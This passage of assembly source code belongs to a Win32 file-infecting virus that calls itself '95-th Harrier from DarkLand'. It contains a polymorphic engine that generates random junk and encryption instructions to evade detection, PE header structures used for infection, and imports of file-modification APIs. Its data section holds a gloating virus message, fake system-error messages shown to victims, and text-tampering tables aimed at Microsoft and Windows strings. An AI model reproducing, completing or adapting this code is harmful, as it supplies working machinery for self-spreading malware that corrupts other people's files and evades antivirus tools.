Ax,0E2h StosW Ret GenAnyCom_7$: Dec EAx Jnz GenAnyCom_8$ ; ">7" Mov Al,0D1h ; Rol; Shl; StosB ; Ror; Shr; Sar; Pop EAx ; Rcl; Rcr Push EBx Mov EBx,EAx GenAnyCom_7_0$: Mov EAx,8h Call Random Cmp Al,6h Je GenAnyCom_7_0$ Shl Al,3h Or Al,Bl Or Al,0C0h StosB Pop EBx Pop EAx Ret GenAnyCom_8$: Dec EAx Jnz GenAnyCom_9$ ; ">8" Mov Al,89h ; Mov Reg1,Reg2 StosB Pop EAx Shl Al,3h Or Al,Ah Or Al,0C0h StosB Pop EAx Ret GenAnyCom_9$: Dec EAx Jnz GenAnyCom_10$ ; ">9" Mov Al,4h ; Adc; Sbb; Or; And Call Random Inc Al Shl Al,3h Or Al,1h Push EBx Mov EBx,EAx Mov Al,2h Call Random Shl Al,1h Or Al,Bl Pop EBx StosB Pop EAx Shl Al,3h Or Al,Ah Or Al,0C0h StosB Pop EAx Ret GenAnyCom_10$: Dec EAx Jnz GenAnyCom_11$ ; ">10" Mov Al,2h ; Adc; Sbb; Or; And [Imm] Call Random Or Al,Al Pop EAx PushF Push EAx Jz GenAnyCom_10a$ Mov Al,66h StosB GenAnyCom_10a$: Mov EAx,2h Call Random Shl Al,1h Or Al,81h StosB Xchg EAx,[ESp] Push EBx Mov EBx,EAx Mov EAx,4h Call Random Inc EAx Shl Al,3h Or Al,0C0h Or Al,Bl Pop EBx StosB Pop EAx Cmp Al,83h Je GenAnyCom_10b$ Mov Ax,Word Ptr RandSeed ; Imm16 StosW PopF Jnz GenAnyCom_10c$ Mov Ax,Word Ptr RandSeed+2 ; Imm32 StosW GenAnyCom_10c$: Pop EAx Ret GenAnyCom_10b$: Mov EAx,100h ; Imm8 Call Random StosB PopF Pop EAx Ret GenAnyCom_11$: Pop EAx Or Al,50h ; Push Reg1 / Pop Reg2 StosB Push EAx ; Seria of commands Mov EAx,5h Call Random Push ECx Mov ECx,EAx Or ECx,ECx Jz GenAnyCm_11_1$ GenAnyCm_11_1$: Mov EAx,[ESp][2*4] Call GenAnyCom Dec ECx Jnz GenAnyCm_11_2$ GenAnyCm_11_2$: Pop ECx Pop EAx Mov Al,Ah Or Al,58h StosB Pop EAx Ret ; --------------------------------------------------------- GenArCom: Push EAx Push EBx ; Some command that pretty Push EDx ; changes registers Mov EBx,EAx ; but don't change some GenArCom_0_1$: Call GetNoESpReg ; registers by # in Ax (Ah,Al) Cmp Al,Bl ; (Corrupt EAx) Je GenArCom_0_1$ Cmp Al,Bh Je GenArCom_0_1$ Mov Dl,Al GenArCom_0_2$: Call GetNoESpReg Cmp Al,Bl Je GenArCom_0_2$ Cmp Al,Bh Je GenArCom_0_2$ Shl Al,3h Or Al,Dl Or Al,0C0h Pop EDx Pop EBx Push EAx Mov EAx,7h Call Random Or EAx,EAx Jnz GenArCom_1$ ; ">0" Pop EAx ; NoReg command Pop EAx Jmp GenNoRegCom GenArCom_1$: Dec EAx Jnz GenArCom_2$ ; ">1" Mov Al,87h ; Xchg Reg1,Reg2 StosB Call StoreByte Pop EAx StosB Call StoreByte Pop EAx Ret GenArCom_2$: Dec EAx Jnz GenArCom_3$ ; ">2" Pop EAx ; Push Reg1; Push Reg2 Mov Ah,Al ; Pop Reg2; Pop Reg1 And Al,7h Or Al,50h StosB Call StoreByte Mov Al,Ah Shr Al,3h And Al,7h Or Al,50h StosB Call StoreByte Push ECx ; Seria of commands Push EAx Mov EAx,5h Call Random Mov ECx,EAx Or ECx,ECx Jz GenArCom_2_1$ GenArCom_2_2$: Mov EAx,[ESp][2*4] Call GenArCom Dec ECx Jnz GenArCom_2_2$ GenArCom_2_1$: Pop EAx Pop ECx Mov Al,Ah And Al,7h Or Al,58h StosB Call StoreByte Mov Al,Ah Shr Al,3h And Al,7h Or Al,58h StosB Call StoreByte Pop EAx Ret GenArCom_3$: Dec EAx Jnz GenArCom_4$ ; ">3" Mov EAx,2h ; Xor Reg1,Reg2 Call Random Or Al,38h Or Al,1h StosB Call StoreByte Pop EAx StosB Call StoreByte Pop EAx Ret GenArCom_4$: Dec EAx Jnz GenArCom_5$ ; ">4" Mov Al,2h ; Add Reg1,Reg2 Call Random ; Sub Reg1,Reg2 Or Al,Al Jz GenArCom_4_1$ Mov Al,28h GenArCom_4_1$: Or Al,1h Push EBx Mov EBx,EAx Mov Al,2h Call Random Or Al,Bl StosB Call StoreByte Pop EBx Pop EAx StosB Call StoreByte Pop EAx Ret GenArCom_5$: Dec EAx Jnz GenArCom_6$ ; ">5" Mov Al,2h ; Add; Sub; Xor [Imm] Call Random Or Al,Al Pop EAx PushF Push EAx Jz GenArCom_5_1$ Mov Al,66h StosB Call StoreByte GenArCom_5_1$: Mov EAx,2h Call Random Shl Al,1h Or Al,81h StosB Call StoreByte Xchg EAx,[ESp] Push EAx Mov EAx,3h Call Random Shl Al,3h Push ECx Mov Cl,Al Mov EAx,002830h Shr EAx,Cl Pop ECx Xchg EBx,[ESp] And Bl,7h Or Al,Bl Or Al,0C0h StosB Call StoreByte Pop EBx Pop EAx Cmp Al,83h Je GenArCom_5_2$ Mov Ax,Word Ptr RandSeed StosW Call StoreWord ; Imm16 PopF Jnz GenArCom_5_3$ Mov Ax,Word Ptr RandSeed+2 ; Imm32 StosW Call StoreWord GenArCom_5_3$: Pop EAx Ret GenArCom_5_2$: Mov EAx,100h ; Imm8 Call Random StosB Call StoreByte PopF Pop EAx Ret GenArCom_6$: Mov Al,0D1h ; Rol Reg,1 StosB ; Ror Reg,1 Call StoreByte Pop EAx Push EBx Mov EBx,EAx Mov EAx,2h Call Random Shl Al,3h And Bl,0C7h Or Al,Bl StosB Call StoreByte Pop EBx Pop EAx Ret ; --------------------------------------------------------- GenMovCom: Push EBx ; Some command that loads Mov EBx,EAx ; registers by values GenMovCom_1$: Call GetNoESpReg ; but don't change some Cmp Al,Bl ; register by # in Ax (Ah,Al) Je GenMovCom_1$ ; set bit in mask Cmp Al,Bh ; transferred in EDx Je GenMovCom_1$ ; (Corrupt EAx) Mov EBx,EAx Push ECx Mov Cl,Al Mov EAx,1 Shl EAx,Cl Or EDx,EAx ; Set bit in mask Pop ECx Mov EAx,2h Call Random Or Al,Al Jz GenMovCom_Lea$ Mov Al,Bl ; Mov style Or Al,0B8h StosB Call StoreByte Mov EAx,RandSeed StosD Call StoreDWord Pop EBx Ret GenMovCom_Lea$: Mov Al,8Dh ; Lea style StosB Call StoreByte Mov Al,Bl Shl Al,3h Or Al,5h StosB Call StoreByte Mov EAx,RandSeed StosD Call StoreDWord Pop EBx Ret ; --------------------------------------------------------- GenNoRegCom: Xor EAx,EAx ; Some command that don't Mov Al,0Eh ; change registers Call Random ; (Corrupt EAx) Or EAx,EAx Jnz GenNoReg_1$ ; ">0" Call GenNoFlagCom ; NoFlag command Ret GenNoReg_1$: Dec EAx Jnz GenNoReg_2$ ; ">1" Mov Al,2h ; Clc or Stc Call Random Or Al,0F8h StosB Ret GenNoReg_2$: Dec EAx Jnz GenNoReg_3$ ; ">2" Mov Al,2h ; Cld or Std Call Random Or Al,0FCh StosB Ret GenNoReg_3$: Dec EAx Jnz GenNoReg_4$ ; ">3" Mov Al,0F5h ; Cmc StosB Ret GenNoReg_4$: Dec EAx Jnz GenNoReg_5$ ; ">4" Mov Al,4h ; Or Reg,Reg Call Random Or Al,8h StosB Call GetEqRegs StosB Ret GenNoReg_5$: Dec EAx Jnz GenNoReg_6$ ; ">5" Mov Al,4h ; And Reg,Reg Call Random Or Al,20h StosB Call GetEqRegs StosB Ret GenNoReg_6$: Dec EAx Jnz GenNoReg_7$ ; ">6" Mov Al,4h ; Cmp Reg1,Reg2 Call Random Or Al,38h StosB Call GetNoEqRegs StosB Ret GenNoReg_7$: Dec EAx Jnz GenNoReg_8$ ; ">7" Mov Al,2h ; Test Reg1,Reg2 Call Random Or Al,84h StosB Call GetNoEqRegs StosB Ret GenNoReg_8$: Dec EAx Jnz GenNoReg_9$ ; ">8" Mov Al,2h ; Test Reg,0XXXXh Call Random Or Al,0F6h StosB Push EAx Call GetReg Or Al,0C0h StosB Pop EAx Cmp Al,0F6h Jne GenNoReg_8_1$ Mov EAx,100h Call Random StosB Ret GenNoReg_8_1$: Mov EAx,RandSeed StosD Ret GenNoReg_9$: Dec EAx Jnz GenNoReg_10$ ; ">9" Mov Al,2h ; Cmp Reg,0XXXXh Call Random Or Al,80h StosB Push EAx Call GetReg Or Al,0F8h StosB Pop EAx Cmp Al,80h Jne GenNoReg_9_1$ Mov EAx,100h Call Random StosB Ret GenNoReg_9_1$: Mov EAx,RandSeed StosD Ret GenNoReg_10$: Dec EAx Jnz GenNoReg_11$ ; ">10" Call GetNoESpReg ; Inc Reg / Dec Reg Or Al,40h Push EBx Mov Bl,Al Mov Al,2h Call Random Shl Al,3h Or Al,Bl Pop EBx StosB Push EAx ; Some seria of commands Push ECx Mov EAx,5h ; How many. . . Call Random Mov ECx,EAx Or ECx,ECx Jz GenNoReg_10_1$ GenNoReg_10_2$: Call GenNoRegCom Dec ECx Jnz GenNoReg_10_2$ GenNoReg_10_1$: Pop ECx Pop EAx Xor Al,8h StosB Ret GenNoReg_11$: Dec EAx Jnz GenNoReg_12$ ; ">11" Mov Al,2h ; Rol Reg,1 / Ror Reg,1 Call Random ; Inc Reg,1 / Dec Reg,1 Push EAx Mov Al,2h Call Random Or Al,Al Pop EAx Mov Ah,0D0h Je GenNoReg_11_0$ Mov Ah,0FEh GenNoReg_11_0$: Or Al,Ah Push EAx StosB Call GetNoESpReg Or Al,0C0h Push EBx Mov Bl,Al Mov Al,2h Call Random Shl Al,3h Or Al,Bl Pop EBx StosB Push EAx ; Some seria of commands Push ECx Mov EAx,5h ; How many. . . Call Random Mov ECx,EAx Or ECx,ECx Jz GenNoReg_11_1$ GenNoReg_11_2$: Call GenNoRegCom Dec ECx Jnz GenNoReg_11_2$ GenNoReg_11_1$: Pop ECx Pop EAx Xchg EAx,[ESp] StosB Pop EAx Xor Al,8h StosB Ret GenNoReg_12$: Dec EAx Jnz GenNoReg_13$ ; ">12" Mov Al,2h ; Xchg Reg1,Reg2 (Twice) Call Random ; (without ESp) Or Al,86h Push EBx Mov Bl,Al Call GetNoEqRegs0 Mov Ah,Bl Pop EBx Xchg Ah,Al StosW Push EAx ; Seria ;-) from One command Call GenNoRegCom Pop EAx StosW Ret GenNoReg_13$: Mov Al,2h ; Add; Sub; Xor [Imm] Call Random ; Sub; Add; Xor [Imm] Or Al,Al PushF ; _Prefix Jz GenNoReg_13_1$ Mov Al,66h StosB GenNoReg_13_1$: Mov Al,4h Call Random Or Al,80h StosB Push EAx ; _ComByte Mov Al,3h Call Random Shl Al,3h Push EAx ; _ComNum Push ECx Mov Cl,Al Mov EAx,002830h Shr EAx,Cl Mov ECx,EAx Call GetNoESpReg Or Cl,Al Xchg EAx,[ESp] ; _RegNum Xchg EAx,ECx Or Al,0C0h StosB Mov EAx,RandSeed Push EAx ; _MagicDWord Mov EAx,[ESp][3*4] Cmp Al,81h Jne GenNoReg13_2$ Mov EAx,[ESp] StosW Mov EAx,[ESp][4*4] Push EAx PopF Jnz GenNoReg13_3$ Mov EAx,[ESp] Shr EAx,16 StosW Jmp GenNoReg13_3$ GenNoReg13_2$: Mov EAx,[ESp] StosB GenNoReg13_3$: Push ECx ; Seria of commands. . . Mov EAx,5h Call Random Mov ECx,EAx Or ECx,ECx Jz GenNoReg13_4$ GenNoReg13_5$: Call GenNoRegCom Dec ECx Jnz GenNoReg13_5$ GenNoReg13_4$: Pop ECx Mov EAx,[ESp][4*4] ; Mirror command Push EAx PopF Jz GenNoReg13_6$ Mov Al,66h StosB GenNoReg13_6$: Mov EAx,[ESp][3*4] StosB Push ECx Mov ECx,[ESp][2*4]+4 Mov EAx,280030h Shr EAx,Cl Mov ECx,EAx Mov EAx,[ESp][1*4]+4 Or Al,Cl Or Al,0C0h StosB Pop ECx Mov EAx,[ESp][3*4] Cmp Al,81h Jne GenNoReg13_7$ Mov EAx,[ESp] StosW Mov EAx,[ESp][4*4] Push EAx PopF Jnz GenNoReg13_8$ Mov EAx,[ESp] Shr EAx,16 StosW GenNoReg13_8$: Add ESp,5*4 Ret GenNoReg13_7$: Mov EAx,[ESp] StosB Add ESp,5*4 Ret ; --------------------------------------------------------- GenNoFlagCom: Xor EAx,EAx ; Some command that don't Mov Al,0Ah ; change anything Call Random ; (Corrupt EAx) Or EAx,EAx Jnz GenNoFlag_1$ ; ">0" Mov Al,90h ; Nop command StosB Ret GenNoFlag_1$: Dec EAx Jnz GenNoFlag_2$ ; ">1" GenNoFlag_1_1$: Mov Al,4h ; Segments DS: ES: SS: Call Random ; Without CS: ! Shl Al,3h Or Al,26h Cmp Al,2Eh Je GenNoFlag_1_1$ StosB Ret GenNoFlag_2$: Dec EAx Jnz GenNoFlag_3$ ; ">2" Mov Ax,0E3h ; JECxZ $+2 StosW Ret GenNoFlag_3$: Dec EAx Jnz GenNoFlag_4$ ; ">3" Mov Al,2h ; Xchg Reg,Reg Call Random Or Al,86h StosB Call GetEqRegs StosB Ret GenNoFlag_4$: Dec EAx Jnz GenNoFlag_5$ ; ">4" Mov Al,4h ; Mov Reg,Reg Call Random Or Al,88h StosB Call GetEqRegs StosB Ret GenNoFlag_5$: Dec EAx Jnz GenNoFlag_6$ ; ">5" Call GetNoESpReg ; Push Reg / Pop Reg Or Al,50h StosB Push EAx ; Some seria of commands Push ECx Mov EAx,5h ; How many. . . Call Random Mov ECx,EAx Or ECx,ECx Jz GenNoFlag_5_1$ GenNoFlag_5_2$: Call GenNoFlagCom Dec ECx Jnz GenNoFlag_5_2$ GenNoFlag_5_1$: Pop ECx Pop EAx Or Al,8h StosB Ret GenNoFlag_6$: Dec EAx Jnz GenNoFlag_7$ ; ">6" Mov Al,10h ; Jcc $+2 Call Random Or Al,70h StosB Xor Al,Al StosB Ret GenNoFlag_7$: Dec EAx Jnz GenNoFlag_8$ ; ">7" Mov Al,0EBh ; Jmps $+? StosB Mov Al,20h ; Jmp distance. . . Call Random StosB Push ECx Mov ECx,EAx Or ECx,ECx Jz GenNoFlag_7_1$ GenNoFlag_7_2$: Mov EAx,100h Call Random StosB Dec ECx Jnz GenNoFlag_7_2$ GenNoFlag_7_1$: Pop ECx Ret GenNoFlag_8$: Dec EAx Jnz GenNoFlag_9$ ; ">8" Mov Al,60h ; PushA / PopA StosB Push ECx ; Some seria of commands Mov EAx,5h ; How many. . . Call Random Mov ECx,EAx Or ECx,ECx Jz GenNoFlag_8_1$ GenNoFlag_8_2$: Call GenNoFlagCom Dec ECx Jnz GenNoFlag_8_2$ GenNoFlag_8_1$: Pop ECx Mov Al,61h StosB Ret GenNoFlag_9$: Mov Al,9Ch ; PushF / PopF StosB Push ECx ; Some seria of commands Mov EAx,5h ; How many. . . Call Random Mov ECx,EAx Or ECx,ECx Jz GenNoFlag_9_1$ GenNoFlag_9_2$: Call GenNoFlagCom Dec ECx Jnz GenNoFlag_9_2$ GenNoFlag_9_1$: Pop ECx Mov Al,9Dh StosB Ret ; --------------------------------------------------------- GetNoEqRegs0: Call GetNoESpReg ; Get Registers Mod R/M Push EBx ; byte with any NoEq Mov Bl,Al ; registers inside Call GetNoESpReg ; this pack (without ESp) Shl Al,3h Or Al,Bl Or Al,0C0h Pop EBx Ret GetNoEqRegs: Call GetReg ; Get Registers Mod R/M Push EBx ; byte with any NoEq Mov Bl,Al ; registers inside Call GetReg ; this pack Shl Al,3h Or Al,Bl Or Al,0C0h Pop EBx Ret GetEqRegs: Call GetReg ; Get Registers Mod R/M Mov Ah,Al ; byte with any Eq registers Shl Al,3h ; inside this pack Or Al,Ah Or Al,0C0h Ret GetNoESpReg: Call GetReg ; Get register number Cmp Al,4h ; but without ESP Je GetNoESPReg Ret GetReg: Mov EAx,8h ; Get register number Call Random Ret ; --------------------------------------------------------- Enumer: Push EAx ; Enumerates the some Push ECx ; procedure in EBx Mov EAx,ECx ; ECx times with Call Random ; parameters in EAx Or ECx,ECx Jz Enumer_0$ Enumer_1$: Mov EAx,[ESp][4] Call EBx Dec ECx Jnz Enumer_1$ Enumer_0$: Pop ECx Pop EAx Ret ; --------------------------------------------------------- StoreByte: Cmp Byte Ptr pEnableEncr,0h ; Stores the Byte data Je StoreByte_0$ ; into encryptor buffer Mov [ESi],Al Inc ESi StoreByte_0$: Ret StoreWord: Cmp Byte Ptr pEnableEncr,0h ; Stores the Word data Je StoreWord_0$ ; into encryptor buffer Mov [ESi],Ax Add ESi,2h StoreWord_0$: Ret StoreDWord: Cmp Byte Ptr pEnableEncr,0h ; Stores the DWord data Je StoreDWord_0$ ; into encryptor buffer Mov [ESi],EAx Add ESi,4h StoreDWord_0$: Ret ; --------------------------------------------------------- Random: Push EDx ; Generate some random number Push ECx ; to EAx by border in EAx Push EAx ; (0..Border-1) Mov EAx,RandSeed ; Don't corrupt registers Mov ECx,8088405h ; [from TurboPascal v7.0] Mul ECx ; (Based on Congruent Inc EAx ; generating algorythm) Mov RandSeed,EAx Pop ECx Mul ECx Pop ECx Mov EAx,EDx Pop EDx Ret ;Separator=_Nop ; --------------------------------------------------------- ; Data for convertor ;DefCodeLine ConvertDataLen = 4h ConvertData Label DWord Dd Offset SearchStr1 Dd Offset ReplaceStr1 Dd Offset SearchStr2 Dd Offset ReplaceStr2 Dd Offset SearchStr3 Dd Offset ReplaceStr3 Dd Offset SearchStr4 Dd Offset ReplaceStr4 ;BreakCodeLine SearchStr1 Db 'MICROSOFT',0 SearchStr2 Db 'WINDOWS',0 SearchStr3 Db 'BILL GATES',0 SearchStr4 Db 'HARRIER',0 ReplaceStr1 Db 'MIcrOSOFT',0 ReplaceStr2 Db 'WINDOwS',0 ReplaceStr3 Db 'Gill Bates',0 ReplaceStr4 Db 'Oh! Guys! Is it about me?',0 ; --------------------------------------------------------- ;DefCodeLine InfoName Db '\OEMINFO.INI',0h InfoNameL = $-InfoName ;BreakCodeLine ;DefCodeLine BitMapName Db '\OEMLOGO.BMP',0h BitMapNameL = $-BitMapName ;BreakCodeLine SelfSectionName Db '.TEXT',0,0,0 InfSelfHeader Db '"95-th Harrier from DarkLand"',0 InfEnterDebug Db 'Entering to DEBUG mode.',0 InfCancelMsg Db 'Infecting aborted by Creator!',0 InfNoNameMsg Db 'Name not specified.',0 ;DefCodeLine HelloMsg Label Byte Db 'Oops, World, it is Me!',Cr Db 'Can You image it? I am the Win32 platform based virus!',Cr Db 'Hey, Daniloff! Will You porte Your DrWeb at this platform?',Cr Db 'Hmm, Guy, what You think about Watcom C++ ?',Cr Db Cr Db 'Greetings goes to Gill Bates and to her Mircosoft Windoze 95 sucks,',Cr Db ' and to rest lame part of world.',Cr Db Cr Db 'Ugly Lamers MUST DIE!',Cr Db Cr Db 'Who am I ? I am the "95-th Harrier from DarkLand" !!!',Cr Db 'I come from dark, I invade Your PC and now I will invade Your mind. . .',Cr Db Cr Db ' TechnoRat',Cr Db Cr Db Ver,Release,BasedOn,Cr Db 0 ;BreakCodeLine InfGodHelp Db 'God will help! ;-)',0 ; --------------------------------------------------------- ;DefCodeLine FuckMsgCounter = 6h FuckMessages Label DWord Dd FuckMsg1,FuckMsg2,FuckMsg3,FuckMsg4,FuckMsg5,FuckMsg6 ;BreakCodeLine FuckMsg1 Db 'System malfunction!',0 FuckMsg2 Db 'VXDs rings overcrossed!',0 FuckMsg3 Db 'CPU mode thunking error!',0 FuckMsg4 Db 'CPU overclocked, cooler device emergency!',0 FuckMsg5 Db 'Help subsystem is damaged!',0 FuckMsg6 Db 'Attention! Bugs inside computer, use SoftIce.',0 ; --------------------------------------------------------- ; Here will be placed the very nice files. . . BFile BitMapFile,HarrLogo.Bmp,HarrBtMpFile_Sz BFile InfoFile,HarrInfo.Ini,HarrInfoFile_Sz MemBase Dd ? ; Program base in memory HostIP Dd ? ; for returning to host Here Dd ? ; self place in RAM Debug Dd 0h ; debugging flag HelpCounter Dd 0h ; for FuckingHelp ;-) InitOk Dd 1h ; Initialize semaphore: ; 0 - process performing ; 1 - must be initialized ; 2 - initialized Ok. ; --------------------------------------------------------- ; Real copyright by creator. ;DefCodeLine Irpc Char,<(C)reated by TechnoRat (hacker)> Db '&Char' Xor 0FFh EndM ;BreakCodeLine ; --------------------------------------------------------- RandSeed Dd ? StubEntryLabel Dd ? ImagePlace Dd ? CurrentPlace Dd ? PolyMorphSz Dd 0h ; The size of decriptors StubImportPlace Dd ? ImportPlace Dd ? ImportLength Dd ? BufferPlace Dd ? ; --------------------------------------------------------- ; The Virtual stack variables Var DosHeader ,40h ; Dos Header place Var FileHandle ,DWord ; Generic file variables Var FileAttributes ,DWord Var FileNamePtr ,DWord Var FileLastWrite ,8h ; Generic file Date/Time Var FileLastAccess ,8h Var FileCreation ,8h Var ProcessedBytes ,DWord Var NewSeconds ,Word Var PackedTime ,8h Var SomePath ,MaxPathLen Var PEFileHeaders ,DWord Var ImportLegal ,DWord ; Import section parameters Var ImportPhysOffs ,DWord Var ImportRVA ,DWord Var ImportFlags ,DWord Var ImportOrder ,DWord ;DefCodeLine Var FT_Struc ,0h ; System Time description Var FT_Year ,Word Var FT_Month ,Word Var FT_DayOfWeek ,Word Var FT_Day ,Word Var FT_Hour ,Word Var FT_Minute ,Word Var FT_Second ,Word Var FT_Milliseconds ,Word ;BreakCodeLine Var pBaseReg ,Byte ; PolyMorph gen. vars Var pSemReg ,Byte Var pEnableEncr ,Byte Var pBase ,DWord Var pSem ,DWord Var pXchg ,DWord Var pMov ,DWord Var pBaseAdd ,DWord Var pBaseSub ,DWord Var pAgain ,DWord Var pAgain_E ,DWord Var pAdd ,DWord Var GenSz ,DWord ; PolyMorph link vars Var GenCrSz ,DWord Var GenTotalSz ,DWord Var Cryptors ,2*4*16 Var CryptCnt ,DWord ;DefCodeLine Var Section ,0h SectBegin = _VarAddr ; Section header description Var SectName ,8h Var SectVirtSize ,DWord Var SectRVA ,DWord Var SectPhysSize ,DWord Var SectPhysOffs ,DWord Var SectR ,3*4h Var SectFlags ,DWord SectSize = _VarAddr-SectBegin ;BreakCodeLine ;DefCodeLine Var SelfSection ,0h SelfSectBegin = _VarAddr ; Self section description Var SelfSectName ,8h Var SelfSectVirtSize,DWord Var SelfSectRVA ,DWord Var SelfSectPhysSize,DWord Var SelfSectPhysOffs,DWord Var SelfSectR ,3*4h Var SelfSectFlags ,DWord SelfSectSize = _VarAddr-SelfSectBegin ;BreakCodeLine ;DefCodeLine Var PEHeader ,0h PEHeaderBegin = _VarAddr ; PE Header description Var PE_Sign ,DWord Var PE_CPUType ,Word Var PE_NumOfSections,Word Var PE_TimeDate ,DWord Var PE_PtrToCOFFTbl ,DWord Var PE_COFFTblSize ,DWord Var PE_NTHdrSize ,Word Var PE_Flags ,Word Var PE_Magic ,Word Var PE_LMajor ,Byte Var PE_LMinor ,Byte Var PE_SizeOfCode ,DWord Var PE_SizeOfIData ,DWord Var PE_SizeOfUIData ,DWord Var PE_EntryPointRVA,DWord Var PE_BaseOfCode ,DWord Var PE_BaseOfData ,DWord Var PE_ImageBase ,DWord Var PE_ObjectAlign ,DWord Var PE_FileAlign ,DWord Var PE_OsMajor ,Word Var PE_OsMinor ,Word Var PE_UserMajor ,Word Var PE_UserMinor ,Word Var PE_SubSysMajor ,Word Var PE_SubSysMinor ,Word Var PE_R1 ,DWord Var PE_ImageSize ,DWord Var PE_HeaderSize ,DWord Var PE_FileChkSum ,DWord Var PE_SubSystem ,Word Var PE_DllFlags ,Word Var PE_StackReserveSz,DWord Var PE_StackCommitSz,DWord Var PE_HeapReserveSz,DWord Var PE_HeapCommitSz ,DWord Var PE_LoaderFlags ,DWord Var PE_NumOfRVAAndSz,DWord Var PE_ExportTableRVA,DWord Var PE_ExportDataSz ,DWord Var PE_ImportTableRVA,DWord Var PE_ImportDataSz ,DWord Var PE_RsrcTableRVA ,DWord Var PE_RsrcDataSz ,DWord Var PE_ExceptTableRVA,DWord Var PE_ExceptDataSz ,DWord Var PE_SecurTableRVA,DWord Var PE_SecurDataSz ,DWord Var PE_FixUpTableRVA,DWord Var PE_FixUpDataSz ,DWord Var PE_DebugTableRVA,DWord Var PE_DebugDataSz ,DWord Var PE_ImageDescrRVA,DWord Var PE_DescriptionSz,DWord Var PE_MachineSpecRVA,DWord Var PE_MachineSpecSz,DWord Var PE_TLSRVA ,DWord Var PE_TLSSz ,DWord Var PE_R0 ,30h PEHeaderSize = _VarAddr-PEHeaderBegin If PEHeaderSize NE 0F8h .Err 'PEHeader described incorrectly!' EndIf ;BreakCodeLine ;StopCode Var VeryLargeBuffer ,0h ; Rest of memory ;-) ; --------------------------------------------------------- _VarAddr = 0h Var ConvertVar ,4*4 ; Tiny Stack variables Var SmallBuffer ,0h ; (memory buffer) ; --------------------------------------------------------- ;StartData Extern MessageBoxA:Proc ; External functions Extern CreateFileA:Proc ; which imported Extern SetFilePointer:Proc ; form some system Extern CloseHandle:Proc ; DLL's (providers Extern ReadFile:Proc ; of this functions) Extern WriteFile:Proc Extern SetFilePointer:Proc Extern GetFileAttributesA:Proc Extern SetFileAttributesA:Proc Extern GetFileTime:Proc Extern SetFileTime:Proc Extern CopyFileA:Proc Extern MoveFileA:Proc Extern GetEnvironmentStringsA:Proc Extern MessageBeep:Proc Extern FileTimeToSystemTime:Proc Extern SystemTimeToFileTime:Proc Extern GetSystemTime:Proc Extern GetSystemDirectoryA:Proc ;StopData ; --------------------------------------------------------- End Start ; *==================================================================* ; ! T I M E T O D I E ! ; *==================================================================*